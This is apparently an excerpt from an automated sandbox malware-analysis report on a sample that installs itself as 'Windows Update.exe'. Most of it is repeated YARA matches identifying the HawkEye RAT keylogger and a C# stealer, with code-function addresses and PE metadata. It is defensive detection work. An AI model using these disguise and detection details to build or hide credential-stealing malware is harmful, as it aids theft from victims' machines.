          Source: 00000002.00000002.291521813.0000000004B22000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000002.00000002.291521813.0000000004B22000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.352528568.00000000028C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000A.00000000.352528568.00000000028C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.344665694.00000000028C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000A.00000000.344665694.00000000028C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2128
          Source: C:\Users\user\Desktop\5.exeCode function: 1_2_004060431_2_00406043
          Source: C:\Users\user\Desktop\5.exeCode function: 1_2_004046181_2_00404618
          Source: C:\Users\user\Desktop\5.exeCode function: 1_2_0040681A1_2_0040681A
          Source: C:\Users\user\Desktop\5.exeCode function: 1_2_6F1E8F101_2_6F1E8F10
          Source: C:\Users\user\Desktop\5.exeCode function: 1_2_6F1E87661_2_6F1E8766
          Source: C:\Users\user\Desktop\5.exeCode function: 1_2_6F1F2A1E1_2_6F1F2A1E
          Source: C:\Users\user\Desktop\5.exeCode function: 1_2_6F1F2A0F1_2_6F1F2A0F
          Source: C:\Users\user\Desktop\5.exeCode function: 1_2_6F1E3AEE1_2_6F1E3AEE
          Source: C:\Users\user\Desktop\5.exeCode function: 1_2_6F1EA2E31_2_6F1EA2E3
          Source: C:\Users\user\Desktop\5.exeCode function: 1_2_6F1E81F41_2_6F1E81F4
          Source: C:\Users\user\Desktop\5.exeCode function: 1_2_6F1E7C821_2_6F1E7C82
          Source: C:\Users\user\Desktop\5.exeCode function: 2_2_0040A2A52_2_0040A2A5
          Source: C:\Users\user\Desktop\5.exeCode function: 2_2_023A1D982_2_023A1D98
          Source: C:\Users\user\Desktop\5.exeCode function: 2_1_0040A2A52_1_0040A2A5
          Source: C:\Users\user\Desktop\5.exeCode function: 2_2_023A1DA82_2_023A1DA8
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 6_2_6F7187666_2_6F718766
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 6_2_6F718F106_2_6F718F10
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 6_2_6F722A1E6_2_6F722A1E
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 6_2_6F722A0F6_2_6F722A0F
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 6_2_6F71A2E36_2_6F71A2E3
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 6_2_6F713AEE6_2_6F713AEE
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 6_2_6F7181F46_2_6F7181F4
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 6_2_6F717C826_2_6F717C82
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 10_2_0040A2A510_2_0040A2A5
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 10_2_0255884010_2_02558840
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 10_2_0255604810_2_02556048
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 10_2_0255709810_2_02557098
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 10_2_0255A4A010_2_0255A4A0
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 10_2_0255575810_2_02555758
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 10_2_0255708910_2_02557089
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 10_2_02551D9810_2_02551D98
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 10_2_02558B9810_2_02558B98
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 10_1_0040A2A510_1_0040A2A5
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 15_2_00404DDB15_2_00404DDB
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 15_2_0040BD8A15_2_0040BD8A
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 15_2_00404E4C15_2_00404E4C
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 15_2_00404EBD15_2_00404EBD
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 15_2_00404F4E15_2_00404F4E
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 16_2_0040441916_2_00404419
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 16_2_0040451616_2_00404516
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 16_2_0041353816_2_00413538
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 16_2_004145A116_2_004145A1
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 16_2_0040E63916_2_0040E639
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 16_2_004337AF16_2_004337AF
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 16_2_004399B116_2_004399B1
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 16_2_0043DAE716_2_0043DAE7
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 16_2_00405CF616_2_00405CF6
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 16_2_00403F8516_2_00403F85
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 16_2_00411F9916_2_00411F99
          Source: 5.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Windows Update.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: WindowsUpdate.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 5.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 10.0.Windows Update.exe.4b3fa72.56.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.4b3fa72.56.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5.exe.4a5dc92.9.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.2.5.exe.4a5dc92.9.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5.exe.4b28208.18.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.2.5.exe.4b28208.18.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.2.5.exe.4b28208.18.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.4a50000.52.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.4a50000.52.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.4a50000.52.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.4aadc72.51.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.4aadc72.51.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.2.5.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.2.5.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.38c3258.47.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.38c3258.47.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.38c3258.47.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.2.5.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.2.5.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.41b460.39.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.41b460.39.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.41b460.39.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.4a56408.32.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.41ce65.0.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.41ce65.0.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.4a56408.32.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.4a56408.32.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.Windows Update.exe.75c0000.20.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.415058.18.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.415058.18.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.415058.18.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.38cb065.46.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.38cb065.46.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.38c3258.25.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.38c3258.25.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.38c3258.25.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.4ae9c0d.34.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.4ae9c0d.34.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.4a57e0d.53.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.4a57e0d.53.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.Windows Update.exe.4a50000.15.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.4a50000.15.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.2.Windows Update.exe.4a50000.15.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.5.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.0.5.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.0.5.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.5.exe.415058.16.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.0.5.exe.415058.16.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.0.5.exe.415058.16.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.Windows Update.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.2.Windows Update.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.49d0e2d.26.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.49d0e2d.26.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.5.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.0.5.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.0.5.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.5.exe.41b460.11.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.0.5.exe.41b460.11.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.0.5.exe.41b460.11.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.5.exe.41b460.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.1.5.exe.41b460.2.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.1.5.exe.41b460.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.Windows Update.exe.38c3258.7.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.38c3258.7.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.2.Windows Update.exe.38c3258.7.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.5.exe.41b460.14.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.0.5.exe.41b460.14.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.0.5.exe.41b460.14.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5.exe.4a90000.12.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.2.5.exe.4a90000.12.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.2.5.exe.4a90000.12.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.Windows Update.exe.4a26c92.9.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.4a26c92.9.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5.exe.4b29c0d.17.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.2.5.exe.4b29c0d.17.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
